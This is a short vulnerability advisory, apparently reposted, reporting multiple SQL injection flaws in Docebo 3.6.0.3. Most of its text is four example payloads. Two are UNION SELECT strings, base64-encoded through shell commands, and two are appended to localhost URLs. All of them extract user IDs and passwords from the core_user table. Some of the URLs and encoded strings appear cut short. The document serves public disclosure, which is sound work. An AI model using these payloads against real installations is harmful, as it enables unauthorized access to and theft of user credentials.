13.03.21 Docebo Multiple SQL-Injection Vulnerabilities | |
****************************** Application: Docebo Version affected: 3.6.0.3 Website: http://www.docebo.com Discovered By: Andrea Fabrizi Email: andrea.fabrizi@gmail.com Web: http://www.andreafabrizi.it Vuln: Multiple SQL-Injection Vulnerabilities ****************************** ########## EXAMPLE 1 ########## roland@hp6720s:~$ echo -n "' union select userid,pass from core_user -- " | base64 JyB1bmlvbiBzZWxlY3QgdXNlcmlkLH -> http://localhost/docebo/ ############################## ########## EXAMPLE 2 ########## roland@hp6720s:~$ echo -n "' union select 1,userid,pass from core_user -- " | base64 JyB1bmlvbiBzZWxlY3QgMSx1c2VyaW -> http://localhost/docebo/ ############################## ########## EXAMPLE 3 ########## -> http://localhost/docebo/ union select concat (userid,0x3d,pass),2,3 from core_user limit 1,2 ############################## ########## EXAMPLE 4 ########## -> http://localhost/docebo/ union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2 ############################## -- Andrea Fabrizi http://www.andreafabrizi.it | |
|
Total comments: 0 | |